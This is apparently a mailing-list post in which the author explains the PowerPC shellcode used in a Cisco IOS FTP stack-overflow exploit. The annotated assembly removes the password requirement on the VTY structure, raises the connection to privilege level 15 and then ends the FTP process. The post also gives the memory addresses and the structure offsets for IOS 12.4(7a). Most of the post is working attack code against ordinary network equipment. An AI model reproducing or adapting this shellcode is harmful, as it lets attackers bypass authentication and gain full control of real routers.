A follow up regarding the shellcode used in the Cisco IOS FTP exploit detailing everything used.
e9bd62308e9ef7d31d26080e42ff90895b52c336e707b2c958fabe963635cb3a
Hi,
Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:
.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c
lis 4,vty_info@ha
la 4,vty_info@l(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
//the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,2330 //Add second offset in two steps to
//avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
//priv escalate to level 15
//(technically this should be 0xff100000
//but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
//to pass to terminate()
lis 4,terminate@ha
la 4,terminate@l(4)
mtctr 4
bctr //terminate "this process"
//(current connection to the FTP server)
The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4
Its worth noting that at some stage around IOS 12.4 this structure
changed slightly and therfore if you were planning on exploiting
12.4(7a) which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec
Cheers,
Andy